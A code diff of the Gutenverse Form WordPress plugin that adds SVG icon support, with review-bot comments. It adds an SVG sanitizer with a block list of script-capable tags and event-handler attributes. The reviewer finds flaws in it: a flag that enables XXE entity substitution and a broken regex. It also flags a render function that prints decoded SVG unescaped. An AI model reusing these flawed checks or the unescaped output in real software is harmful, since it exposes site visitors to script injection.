-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
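
Review bot: the else branch kept in this hunk still reads $this->attrs['iconColorGradient'] without an isset() guard and re-applies the base gradient that the hunk at -566 already handles. The same else branch was deleted from class-form-input-date.php, class-form-input-email.php and class-form-input-number.php in this patch, so the telp class should drop it too, both here and in the iconColorGradientFocus hunk at -700.
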
@@ -676,7 +676,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +700,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-telp-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-text.php
+++ b/gutenverse-form/includes/style/class-form-input-text.php
@@ -384,7 +384,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -470,11 +470,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
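Review bot: in the `iconSize` block, `font-size: {$value}px;` is now also emitted for the `.icon svg` selector, but `font-size` only resizes an inline SVG when the stylesheet sizes that element in `em` (for example `width: 1em; height: 1em`), which nothing in this patch shows. The same applies to the `handle_color( $value, 'color' )` rules extended to `svg` in the neighbouring hunks, which only take effect if the SVG paints with `currentColor`. Either emit `width`/`height` and `fill` for the svg selector, or document next to these selectors the base CSS they depend on.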
@@ -542,7 +542,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -566,7 +566,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -602,7 +602,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -626,9 +626,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -676,7 +676,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -700,9 +700,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-text-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/includes/style/class-form-input-textarea.php
+++ b/gutenverse-form/includes/style/class-form-input-textarea.php
@@ -397,7 +397,7 @@
 		if ( isset( $this->attrs['inputColorFocus'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .gutenverse-input:focus, .{$this->element_id} .gutenverse-input:focus-visible, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -483,11 +483,11 @@
 			);
 		}

-		if ( isset( $this->attrs['iconType'] ) && 'icon' === $this->attrs['iconType'] ) {
+		if ( isset( $this->attrs['iconType'] ) && in_array( $this->attrs['iconType'], array( 'icon', 'svg' ), true ) ) {
 			if ( isset( $this->attrs['iconSize'] ) ) {
 				$this->inject_style(
 					array(
-						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i",
+						'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon svg",
 						'property'       => function ( $value ) {
 							return "font-size: {$value}px;";
 						},
@@ -555,7 +555,7 @@
 		if ( isset( $this->attrs['iconColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -579,7 +579,7 @@
 		}

 		if ( isset( $this->attrs['iconColorGradient'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackground'] ) ) {
@@ -615,7 +615,7 @@
 		if ( isset( $this->attrs['iconHoverColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -639,9 +639,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientHover'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradientHover'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:hover .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradientHover'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundHover'] ) ) {
@@ -689,7 +689,7 @@
 		if ( isset( $this->attrs['iconFocusColor'] ) ) {
 			$this->inject_style(
 				array(
-					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i",
+					'selector'       => ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon svg",
 					'property'       => function ( $value ) {
 						return $this->handle_color( $value, 'color' );
 					},
@@ -713,9 +713,9 @@
 		}

 		if ( isset( $this->attrs['iconColorGradientFocus'] ) ) {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradientFocus'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper:focus-within .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradientFocus'] );
 		} else {
-			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i", $this->attrs['iconColorGradient'] );
+			$this->custom_handle_background( ".{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient i, .{$this->element_id} .main-wrapper .input-icon-wrapper .form-input-textarea-icon .icon.style-gradient svg", $this->attrs['iconColorGradient'] );
 		}

 		if ( isset( $this->attrs['iconBackgroundFocus'] ) ) {
--- a/gutenverse-form/lib/dependencies/blocks.asset.php
+++ b/gutenverse-form/lib/dependencies/blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes'), 'version' => '46b95f535c51dae7ed80');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes'), 'version' => '559a55ac8f6aa1b924b4');
--- a/gutenverse-form/lib/dependencies/form.asset.php
+++ b/gutenverse-form/lib/dependencies/form.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => 'ff1b907ff9cee36cc808');
+<?php return array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '0743550171eaa2b83007');
--- a/gutenverse-form/lib/dependencies/frontend/form-builder.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/form-builder.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-api-fetch', 'wp-hooks'), 'version' => '0b56319b807e1b99b86f');
+<?php return array('dependencies' => array('wp-api-fetch', 'wp-hooks'), 'version' => 'f1bfe33714d2ba01b091');
--- a/gutenverse-form/lib/dependencies/frontend/input-date.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/input-date.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'f5817aa23b8606ae6184');
+<?php return array('dependencies' => array(), 'version' => '2370e046ea29efa2ee3b');
--- a/gutenverse-form/lib/dependencies/frontend/input-select.asset.php
+++ b/gutenverse-form/lib/dependencies/frontend/input-select.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '6e25723566701a3a4718');
+<?php return array('dependencies' => array(), 'version' => '59797a5527fef8836b81');
--- a/gutenverse-form/lib/framework/bootstrap.php
+++ b/gutenverse-form/lib/framework/bootstrap.php
@@ -15,7 +15,7 @@
 	return;
 }

-defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.3.2' );
+defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.4.0' );
 defined( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION', '2.1.0' );
 defined( 'GUTENVERSE_FRAMEWORK_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_DIR', __DIR__ );
 defined( 'GUTENVERSE_FRAMEWORK_CLASS_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_CLASS_DIR', GUTENVERSE_FRAMEWORK_DIR . '/includes' );
--- a/gutenverse-form/lib/framework/helper.php
+++ b/gutenverse-form/lib/framework/helper.php
@@ -6,6 +6,71 @@
  * @since 1.0.0
  * @package gutenverse-framework
  */
+if ( ! function_exists( 'gutenverse_is_svg_safe' ) ) {
+	/**
+	 * Sanitizer SVG Content
+	 *
+	 * @return mixed
+	 */
+	function gutenverse_is_svg_safe( $svg ) {
+		libxml_use_internal_errors( true );
+
+		// Prevent XXE attacks
+		$svg = preg_replace( '/<!DOCTYPE.+?>/i', '', $svg );
+
+		$dom = new DOMDocument();
+
+		if ( ! $dom->loadXML( $svg, LIBXML_NONET | LIBXML_NOENT | LIBXML_COMPACT ) ) {
+			return false;
+		}
+
+		$xpath = new DOMXPath( $dom );
+
+		/**
+		 * ❌ Forbidden SVG elements
+		 */
+		$forbidden_tags = array(
+			'script',
+			'foreignObject',
+			'iframe',
+			'object',
+			'embed',
+			'audio',
+			'video',
+		);
+
+		foreach ( $forbidden_tags as $tag ) {
+			if ( $xpath->query( '//*[local-name()="' . $tag . '"]' )->length > 0 ) {
+				return false;
+			}
+		}
+
+		/**
+		 * ❌ Forbidden attributes
+		 * - Event handlers (onload, onclick, etc)
+		 * - javascript: URLs
+		 */
+		foreach ( $xpath->query( '//@*' ) as $attr ) {
+			if (
+			preg_match( '/^on/i', $attr->nodeName ) ||
+			preg_match( '/javascript:/i', $attr->nodeValue )
+			) {
+				return false;
+			}
+		}
+
+		/**
+		 * ❌ Disallow external references
+		 */
+		foreach ( $xpath->query( '//@*' ) as $attr ) {
+			if ( preg_match( '/^(https?:)?///i', trim( $attr->nodeValue ) ) ) {
+				return false;
+			}
+		}
+
+		return true;
+	}
+}

 if ( ! function_exists( 'gutenverse_get_event_banner' ) ) {
 	/**
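Review bot: the `loadXML()` call passes `LIBXML_NOENT`, which turns entity substitution on rather than off, so it works against the "Prevent XXE attacks" comment a few lines above it; drop that flag and keep `LIBXML_NONET`. The DOCTYPE strip `'/<!DOCTYPE.+?>/i'` has no `s` modifier, so a declaration that spans several lines is not removed; returning false for any input that contains a DOCTYPE would be simpler and stricter than stripping it. In the external-reference loop, the pattern `'/^(https?:)?///i'` as shown has unescaped `/` characters inside `/` delimiters, so `preg_match()` fails with a warning instead of matching and that check never rejects anything; use another delimiter, for example `'#^(https?:)?//#i'`. The docblock should declare `@param string $svg` and `@return bool` rather than `@return mixed`.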
--- a/gutenverse-form/lib/framework/includes/block/class-block-abstract.php
+++ b/gutenverse-form/lib/framework/includes/block/class-block-abstract.php
@@ -254,4 +254,104 @@

 		return $def;
 	}
+
+	/**
+	 * Render Icon
+	 *
+	 * @param string $type                Icon type.
+	 * @param string $icon                Icon class.
+	 * @param string $svg                 SVG data.
+	 * @param string $element_id          Element ID.
+	 * @param array  $icon_gradient       Icon Gradient.
+	 * @param array  $icon_gradient_hover Icon Gradient Hover.
+	 *
+	 * @return string
+	 */
+	protected function render_icon( $type, $icon, $svg, $element_id = '', $icon_gradient = false, $icon_gradient_hover = false ) {
+		if ( 'svg' === $type && ! empty( $svg ) ) {
+			// phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
+			$svg_data = base64_decode( $svg, true );
+
+			$gradients = '';
+			if ( $icon_gradient || $icon_gradient_hover ) {
+				if ( empty( $element_id ) ) {
+					$element_id = $this->get_element_id();
+				}
+
+				if ( $icon_gradient ) {
+					$gradients .= $this->create_gradient_svg( $icon_gradient, 'iconGradient-' . $element_id );
+				}
+
+				if ( $icon_gradient_hover ) {
+					$gradients .= $this->create_gradient_svg( $icon_gradient_hover, 'iconGradientHover-' . $element_id );
+				}
+			}
+
+			if ( ! empty( $gradients ) ) {
+				$svg_data .= '<svg style="width:0;height:0;position:absolute;" aria-hidden="true" focusable="false"><defs>' . $gradients . '</defs></svg>';
+			}
+
+			return '<div class="gutenverse-icon-svg">' . $svg_data . '</div>';
+		}
+		return '<i aria-hidden="true" class="' . esc_attr( $icon ) . '"></i>';
+	}
+
+	/**
+	 * Create Gradient SVG
+	 *
+	 * @param array  $gradient Gradient data.
+	 * @param string $id       Gradient ID.
+	 *
+	 * @return string
+	 */
+	protected function create_gradient_svg( $gradient, $id ) {
+		$stops = '';
+		if ( isset( $gradient['gradientColor'] ) && is_array( $gradient['gradientColor'] ) ) {
+			foreach ( $gradient['gradientColor'] as $color ) {
+				$stops .= '<stop offset="' . esc_attr( $color['offset'] ) . '" stop-color="' . esc_attr( $color['color'] ) . '"/>';
+			}
+		}
+
+		$type = isset( $gradient['gradientType'] ) ? $gradient['gradientType'] : 'linear';
+
+		if ( 'radial' === $type ) {
+			$radial_pos = isset( $gradient['gradientRadial'] ) ? $gradient['gradientRadial'] : 'center center';
+			$pos        = explode( ' ', $radial_pos );
+			$cx         = '50%';
+			$cy         = '50%';
+			$map        = array(
+				'left'   => '0%',
+				'center' => '50%',
+				'right'  => '100%',
+				'top'    => '0%',
+				'bottom' => '100%',
+			);
+
+			foreach ( $pos as $p ) {
+				if ( isset( $map[ $p ] ) ) {
+					if ( in_array( $p, array( 'left', 'right' ), true ) ) {
+						$cx = $map[ $p ];
+					} elseif ( in_array( $p, array( 'top', 'bottom' ), true ) ) {
+						$cy = $map[ $p ];
+					}
+				}
+			}
+
+			return '<radialGradient id="' . esc_attr( $id ) . '" cx="' . $cx . '" cy="' . $cy . '" r="50%" fx="' . $cx . '" fy="' . $cy . '">
+					' . $stops . '
+				</radialGradient>';
+		}
+
+		$angle = isset( $gradient['gradientAngle'] ) ? (float) $gradient['gradientAngle'] : 180;
+		$rad   = ( $angle * pi() ) / 180;
+
+		$x1 = ( 50 - 50 * sin( $rad ) ) . '%';
+		$y1 = ( 50 + 50 * cos( $rad ) ) . '%';
+		$x2 = ( 50 + 50 * sin( $rad ) ) . '%';
+		$y2 = ( 50 - 50 * cos( $rad ) ) . '%';
+
+		return '<linearGradient id="' . esc_attr( $id ) . '" x1="' . $x1 . '" y1="' . $y1 . '" x2="' . $x2 . '" y2="' . $y2 . '">
+					' . $stops . '
+				</linearGradient>';
+	}
 }
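Review bot: `render_icon()` concatenates the result of `base64_decode( $svg, true )` straight into the returned markup, and nothing in this hunk passes it through `gutenverse_is_svg_safe()` or any escaping, so whatever the block attribute decodes to is printed as HTML. Validate `$svg_data` at this point and treat a `false` decode result or a failed check as "no SVG", falling through to the `<i>` branch, so the render path does not rely on every caller having checked the attribute earlier. In `create_gradient_svg()`, `$color['offset']` and `$color['color']` are read without an `isset()` guard and will raise notices on malformed gradient data.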
--- a/gutenverse-form/lib/framework/includes/block/class-post-abstract.php
+++ b/gutenverse-form/lib/framework/includes/block/class-post-abstract.php
@@ -357,9 +357,11 @@
 		$result           = array();
 		$args             = array();

-		$args['post_type'] = $attr['postType'];
+		$args['post_type']   = $attr['postType'];
+		$args['post_status'] = 'publish';

 		$is_normal_mode = isset( $attr['paginationMode'] ) && in_array( $attr['paginationMode'], array( 'normal-prevnext', 'normal-number' ), true );
+
 		// For native pagination modes, read from URL query parameter.
 		if ( $is_normal_mode ) {
 			$paged = get_query_var( 'paged' ) ? get_query_var( 'paged' ) : get_query_var( 'page' );
@@ -534,8 +536,6 @@
 			$args['monthnum'] = $attr['monthnum'];
 		}

-		$args['post_status'] = 'publish';
-
 		$args = apply_filters( 'gutenverse_default_query_args', $args, $attr );

 		// Query.
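Review bot: `$args['post_status'] = 'publish'` used to be the last assignment before `apply_filters( 'gutenverse_default_query_args', $args, $attr )` and now sits at the top of the function, so any write to `$args['post_status']` in the code between the two hunks would take precedence over it. If the intent is to guarantee that only published posts are queried, keep the assignment immediately before the filter, or confirm in the commit message that nothing in between touches that key.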
@@ -554,7 +554,7 @@
 			'next'       => self::has_next_page( $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $total_next ),
 			'prev'       => self::has_prev_page( $args['paged'] ),
 			'page'       => $args['paged'],
-			'total_page' => self::count_total_page( $attr['paginationMode'], $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $attr['paginationNumberPost'] > 0 ? $attr['paginationNumberPost'] : 1 ),
+			'total_page' => self::count_total_page( isset( $attr['paginationMode'] ) ? $attr['paginationMode'] : '', $query->found_posts, $args['paged'], $args['offset'], $attr['numberPost'], $attr['paginationNumberPost'] > 0 ? $attr['paginationNumberPost'] : 1 ),
 		);
 	}
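Review bot: the `isset()` guard added for `$attr['paginationMode']` on the `total_page` line leaves `$attr['numberPost']` and `$attr['paginationNumberPost']` on the same line unguarded, so a block saved without those attributes still raises an undefined-index notice here. Normalise the three attributes with defaults once at the top of the function instead of guarding one of them inline.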

@@ -717,21 +717,28 @@
 	protected function render_pagination( $prev = false, $next = false, $total = 1, $page = 1 ) {
 		$output          = '';
 		$icon            = esc_attr( $this->attributes['paginationIcon'] ?? '' );
+		$icon_type       = isset( $this->attributes['paginationIconType'] ) ? esc_attr( $this->attributes['paginationIconType'] ) : 'icon';
+		$icon_svg        = isset( $this->attributes['paginationIconSVG'] ) ? $this->attributes['paginationIconSVG'] : '';
 		$icon_position   = esc_attr( $this->attributes['paginationIconPosition'] ?? null );
 		$pre_next_text   = esc_attr( $this->attributes['paginationPrevNextText'] ?? '' );
